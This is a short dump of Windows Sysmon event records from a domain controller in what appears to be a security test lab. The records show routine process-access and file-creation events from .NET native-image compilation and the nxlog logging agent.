{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-001010A31100}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-001010A31100}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.997\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.997","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:33.076\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C5-5F25-0000-001057A71100}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:33.076","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C5-5F25-0000-001057A71100}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:33.076\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C5-5F25-0000-001057A71100}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:33.076","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C5-5F25-0000-001057A71100}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:33.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C5-5F25-0000-001057A71100}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:33.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C5-5F25-0000-001057A71100}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:33.935\r\nProcessGuid: {E2A3D6B1-13C5-5F25-0000-001057A71100}\r\nProcessId: 5004\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\138c-0\\Microsoft.VisualBasic.dll\r\nCreationUtcTime: 2020-08-01 07:03:33.935","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:33.935","ProcessGuid":"{E2A3D6B1-13C5-5F25-0000-001057A71100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\138c-0\\Microsoft.VisualBasic.dll","CreationUtcTime":"2020-08-01 07:03:33.935","EventReceivedTime":"2020-08-01 07:03:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:33.997\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-00101EAC1100}\r\nTargetProcessId: 4472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:33.997","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-00101EAC1100}","TargetProcessId":"4472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:33.997\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-00101EAC1100}\r\nTargetProcessId: 4472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:33.997","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-00101EAC1100}","TargetProcessId":"4472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
